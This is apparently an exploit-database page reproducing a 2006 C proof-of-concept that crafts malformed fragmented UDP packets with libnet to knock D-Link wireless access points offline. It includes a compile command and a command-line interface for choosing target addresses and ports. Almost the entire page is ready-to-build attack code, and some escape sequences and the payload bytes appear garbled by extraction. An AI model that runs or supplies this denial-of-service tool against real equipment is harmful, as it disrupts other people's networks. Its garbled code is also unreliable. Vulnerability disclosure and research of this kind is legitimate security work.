[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : D-Link Wireless Access Point (Fragmented UDP) DoS Exploit
# Published : 2006-02-14
# Author : Aaron Portnoy
# Previous Title : Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005)
# Next Title : Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit
/*
*
* Aaron Portnoy
*
* silc.thunkers.net, thunkers
*
* D-Link Wireless Access Point
* Fragmented UDP DoS Proof of Concept
*
*
* gcc -o dlink_dos dlink_dos.c -lnet -Wall
*
*/
#include <libnet.h>
#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111
void usage (char *name)
{
fprintf (stderr,
"Usage: %s -s <source ip> -d <destination ip>
-a <source port> -b <destination port> n",
name);
exit (EXIT_FAILURE);
}
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
u_short dPRT, int count)
{
libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;
if (!device)
device = DEVICE;
l = libnet_init (LIBNET_RAW4, device, errbuf);
if (!l) {
fprintf (stderr, "libnet_init() failed: %sn", errbuf);
exit (EXIT_FAILURE);
}
src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);
dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);
src_prt = sPRT ? sPRT : SRC_PRT;
dst_prt = dPRT ? dPRT : DST_PRT;
if (count == 1) {
payload = "��������";
payload_s = 8;
}
udp = libnet_build_udp (src_prt,
dst_prt,
(LIBNET_UDP_H + payload_s) * 2,
0, (unsigned char *)payload, payload_s, l, udp);
if (udp == -1) {
fprintf (stderr, "Can't build UDP header: %sn", libnet_geterror (l));
exit (EXIT_FAILURE);
}
switch (count) {
case 1:
frag = IP_MF;
break;
case 2:
frag = 0x2002;
break;
case 3:
frag = 0x0003;
break;
}
ip = libnet_build_ipv4 (20,
0,
1800,
frag,
128,
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);
if (ip == -1) {
fprintf (stderr, "Can't build IP header: %sn", libnet_geterror (l));
exit (EXIT_FAILURE);
}
c = libnet_write (l);
if (c == -1) {
fprintf (stderr, "Write error: %sn", libnet_geterror (l));
exit (EXIT_FAILURE);
}
printf ("Wrote UDP packet; check the wire.n");
libnet_destroy (l);
return (EXIT_SUCCESS);
}
int main (int argc, char **argv)
{
int i;
char *pDST, *pSRC, *device;
u_short dPRT = 0;
u_short sPRT = 0;
pDST = pSRC = device = NULL;
while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {
switch (i) {
case 'D':
device = optarg;
break;
case 'd':
pDST = optarg;
break;
case 's':
pSRC = optarg;
break;
case 'a':
sPRT = atoi (optarg);
break;
case 'b':
dPRT = atoi (optarg);
break;
case 'h':
usage (argv[0]);
break;
}
}
printf ("n----------------------------------n");
printf (" -= D-Link DoS PoC =-n");
printf (" Aaron Portnoyn");
printf (" deft () thunkers ! net n");
printf (" silc.thunkers.net, thunkersn");
printf ("----------------------------------n");
device ? printf ("nDevice: t%sn", device) :
printf ("nDevice: t%sn", DEVICE);
pSRC ? printf ("SRC IP: t%sn", pSRC) :
printf ("SRC IP: t%sn", SRC_IP);
pDST ? printf ("DST IP: t%sn", pDST) :
printf ("DST IP: t%sn", DST_IP);
sPRT ? printf ("SPort: tt%dn", sPRT) :
printf ("SPort: tt%dn", SRC_PRT);
dPRT ? printf ("DPort: tt%dnn", dPRT) :
printf ("DPort: tt%dnn", DST_PRT);
for (i = 1; i <= 3; i++)
gen_packet (device, pSRC, pDST, sPRT, dPRT, i);
printf ("n");
return (EXIT_SUCCESS);
}
// www.Syue.com [2006-02-14]